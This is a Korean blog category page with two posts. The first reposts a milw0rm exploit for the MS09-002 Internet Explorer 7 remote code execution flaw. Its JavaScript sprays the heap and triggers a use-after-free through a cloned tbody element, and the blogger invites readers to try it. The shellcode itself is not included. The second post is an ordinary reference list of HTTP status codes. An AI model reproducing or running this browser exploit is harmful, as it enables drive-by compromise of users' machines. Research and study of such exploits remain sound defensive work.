'Computing/Web'에 해당되는 글 2건

  1. 2009.04.15 [펌] MS09-002 IE7 취약점
  2. 2009.04.07 HTTP STATUS 1

동아리 홈페이지에 올라온 글 ㅋㅋ 테스트 한번 해봐야지 ㅋㅋ ㄱㄱ


MS09-002 IE7 취약점을 이용한 Exploit 코드가 milw0rm에 떴네요.
 Remote code execution이 가능한 크리티컬 취약점입니다.
심심하시면 놀아보세염~

주소 : http://www.milw0rm.com/exploits/8079/

*취약점 코드*/

 var array = new Array();

//Don't need change but for execute time you can change ;)

var calc = 0x100000-(shellcode.length*2+0x01020);

// Spray or Not :-??

var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;

for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}

// N/A Code

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>

# milw0rm.com [2009-02-20]

Posted by Nvdark
,

HTTP STATUS

Computing/Web 2009. 4. 7. 15:36
일하면서 자주보는 ERROR CODES

어떻게는 에러 띄워보겠다고...난리쳐도 먼내용인지 몰라서 패스할때가 ㅋㅋ



HTTP Status Code - 상태 코드 (1xx, 2xx, 3xx, 4xx, 5xx)

상태 코드
 


위에서 언급한 서버의 응답에서 요청한 상태를 표시하는 세자리 숫자와 상태를 설명하는 짧은 문구를 포함하는 것을 다음과 같이 나눌 수 있다
.

코드 범위 

응답의 의미 

100 ~ 199

200 ~ 299

300 ~ 399

400 ~ 499

500 ~ 599

정보 

클라이언트의 요청이 성공적이다.

다른 동작이 더 필요해 클라이언트의 요청을 리다이렉트 했다.

클라이언트의 요청이 불완전하다.

서버오류 

 

100 ~199 정보 응답 

100 Continue

     요청된 초기 부분은 접수되었고 클라이언트는 계속해서 요청할 수 있다.
101 Switching Protocols

     서버는 Upgrade 헤더 필드에 명시된 프로토콜로 교환하기 위한 클라이언트 요청에 따르고 있다.

 

200~299 클라이언트 요청의 성공 응답 

200-299의 범위에 있는 응답은 클라이언트의 요청이 성공적이었다는 것을 의미한다.

200 OK

     클라이언트의요청이성공적이였으며, 서버는요청한데이터를포함하여응답한다.
201 Created

     이 상태 코드는 새로운 URI가 만들어질 때마다 사용된다. 결과 코드와 함께 새로운 데이터가
     위치한 곳을 지정하기 위해
Location 헤더가 서버에 의해 주어진다.
202 Accepted

     요청은 받아들여 졌지만 즉시 실행되지는 않는다. 트랜잭션에 대한 심층 정보가 서버 응답의
     엔티티 몸체에서 주어지기도 한다
. 주의할 점은 요청이 정당한 것처럼 보였을 수도 있지만
     서버가 요청을 실제로 승인하리라는 보장은 없다는 것이다
.
203 Non-Authoritative Information

     엔티티 헤더에 있는 정보는 원래 서버가 아니라 로컬이나 다른 서버로부터 온다.
204 No Content

     이 코드는 응답할 때 주어지는 헤더이다. 그러나 응답된 실제 내용은 없다는 뜻이다.
     
이런 응답을 받는 이유는 웹 브라우저가 문서를 보기 위해 갱신을 하지 않았기 때문이다.
     
이미지맵에서 클라이언트가 이미지의 영역 중 사용하지 않거나 공백인 부분을 클릭했을 때를
     처리할 때 유용하다
.
205 Reset Content

     웹 브라우저가 추가적인 입력을 위해 사용된 트랜잭션을 지우는 것이다. CGI 애플리케이션에서
     데이터를 입력받을 때 적합하다
.
206 Partial Content

     서버가 요청된 크기의 부분 데이터를 반환하고 있다. Range 헤더 지정 요청에 응답하는 데
     이용된다
. 서버는 반드시 Content-Range 헤더와 응답에 포함된 범위를 지정해야 한다.

 

300~399 리다이렉션 

300~399 범위에 있는 응답 코드는 요청이 수행되지 않았다는 것을 나타내며, 클라이언트는 요청을 성공시키기 위해 다른 행위가 필요하다는 것을 나타낸다.

300 Multiple Choices

     요청된 URI는 하나 이상의 리소스를 참조한다. 예를 들면, URI는 여러 개의 언어로 변환된 문서를
     참조할 수 있다
. 서버에 의해 반환된 엔티티 몸체는 올바른 리소스를선택하는 방법에 대한 좀 더
     특정한 데이터의 목록을 가지고 있을수 있다
.
301 Moved Permanently

     요청된 URI는 더 이상 사용되지 않으며 요청에서 지정한 연산은 수행되지 않았다.
     
요청된 문서를 위한 새로운 위치는 Location 헤더에 명시한다. 앞으로 요청될 모든 문서는
     새로운
URI를 사용할 것이다.
302 Found

     요청된 URI는 일시적으로 새로운 URI를 가진다. Location 헤더는 새로운 장소를 가리킨다.
     
만일 이것이 GET이나 HEAD 메소드에 대한 응답이라면 클라이언트는 응답을 받자마자 요청을
     해결하기 위해 새로운
URI를 사용해야 한다.
303 See Other

     요청된 URI는 다른 URI(Location 헤더에 명시한)에서 찾을 수 있으며, 리소스는 GET 메소드로
     구할 수 있다
.
304 Not Modified

     이것은 If-Modified-Since 헤더에 대한 응답 코드로써 지정한 날짜 이래로 수정되지 않았다.
     
엔티티 몸체는 보내지 않으며, 클라이언트는 자신의 로컬 사본을 사용해야 한다.
305 Use Proxy

     요청된 URI Location 헤더에 있는 프록시를 통해서만 접근할 수 있다.
307 Temporary Redirect

     요청된 URI가 일시적으로 옮겨졌다. Location 헤더가 새로운 장소를 가리킨다. 이 상태 코드를
     받는 즉시
, 클라이언트는 요청을 해결하기 위해 새로운 URI를 사용해야 하지만, 앞으로 모든
     요청들은 이전의
URI를 사용할 것이다.

 400~499 클라이언트 요청의 불안전 응답 

400~499 범위에 있는 응답 코드는 클라이언트의 요청이 불안전하며, 클라이언트가 요청을 성공시키려면 다른 정보가 필요하다는 것을 나타낸다.

400 Bad Request

     이 응답 코드는 클라이언트의 요청에 문법적인 오류가 있는 것을 서버가 알아냈다는 것을
     의미한다
.
401 Unauthorized

     이 결과 코드는 WWW-Authenticate 헤더와 함께 그 요청에 적당한 권한이 부족했다는 것을
     나타내기 위해 주어지며
, URI를 다시 요구하면 클라이언트는 적당한 권한으로 접속해야 한다.
402 Payment Required

     이 코드는 아직 HTTP로 구현되지 않았다. 하지만 언젠가는 서버의 문서를 받아 보기 위해
     지불이 필요하다는 것을 나타낸다
.
403 Forbidden

     이 요청은 서버가 클라이언트를 가리키고 싶어하지 않아(또는 아무 이유 없이) 거부되었다.
404 Not Found

     지정한 URI에 문서가 존재하지 않는다.
405 Method Not Allowed

     이 코드는 Allow 헤더와 함께 클라이언트가 사용한 메소드가 이 URI에 대해 지원되지 않는다는
     의미이다
.
406 Not Acceptable

     클라이언트가 지정한 URI는 존재하지만 클라이언트가 원하는 형식이 아니다. 이 코드와 함께
     서버는
Content-Language, Content-Encoding, 그리고 Content-Type 헤더를 제공한다.
407 Proxy Authentication Required

     프록시 서버는 요청된 문서를 보여주기 전에 권한을 필요로 한다. Proxy-Authenticate헤더와
     함께 사용한다
.
408 Request Time-out

     이 응답 코드는 클라이언트의 모든 요청이 지정한 시간(일반적으로 서버의 구성할때 명시한다)
    
동안 처리되지 않았음을 뜻하며, 서버는 네트워크 연결을 끊는다.
409 Conflict
     
이 코드는 다른 요청이나 서버의 구성과 충돌이 있음을 나타낸다. 충돌에대한 정보는 응답되는
     데이터의 일부로 반환된다
.
410 Gone

     이 코드는 요청된 URI가 더 이상 존재하지 않고, 서버에서 완전히 사라졌음을 나타낸다.
411 Length Required

     서버는Content-Length 헤더가 없는 요청을 받아들이지 않는다.
412 Precondition Failed

     하나 이상의 If…헤더에 의해 명시된 조건에 의해 요청을 평가하여 false 값을 가지는 경우이다.
413 Request Entity Too Large
     
서버는 실제 본문이 너무 커서 요청을 처리할 수 없다.
414 Request-URI Too Long
     서버는 요청된 URI가 너무 커서 요청을 처리할 수 없다.
415 Unsupported Media Type
     
서버는 실제 본문이 지원되는 않는 형식이라 처리할 수 없다.
416 Requested Range Not Satisfiable
     
서버는 목표에 대해 어떤 유효한 값도 포함하지 않은 Range 헤더를 찾아냈다.
     
가로 If-Range 헤더는 없어졌다.
417 Expectation Failed
     
Expect 헤더에서 명시된 조건은 만족될 수 없다.

 

500~599서버 오류 

500~599 범위에 있는 응답 코드는 서버가 오류를 만나거나, 클라이언트의 요청을 수행할 수 없음을 나타낸다.

500 Internal Server Error
     
이 코드는 서버의 일부(예를 들면, CGI 프로그램)가 멈추었거나 설정에서 오류가 났음을
     나타낸다
.
501 Not Implemented
     
이 코드는 클라이언트의 요청된 행위가 서버에서 수행할 수 없음을 나타낸다.
502 Bad Gateway
     
이 코드는 서버(또는 프록시)가 다른 서버(또는 프록시)로부터의 응답이 적절하지 않음을
     나타낸다
.
503 Service Unavailable
     
이 코드는 서비스를 일시적으로 제공할 수 없으나, 앞으로 복구된다는 의미이다.
     
만일 서버가 복구될 때를 알기 위해서는 Retry-After 헤더도 함께 제공해야 한다.

504 Gateway Time-out
     
이 응답은 게이트웨이나 프록시의 시간이 경과했다는 것만 빼고는 408(Request Time-out)
     같다
.
505 HTTP Version not supported
     
서버가 요청에 사용된HTTP 프로토콜 버전을 지원하지 않는다.

※ 출처 URL : http://r00tdj.tistory.com/1

Posted by Nvdark
,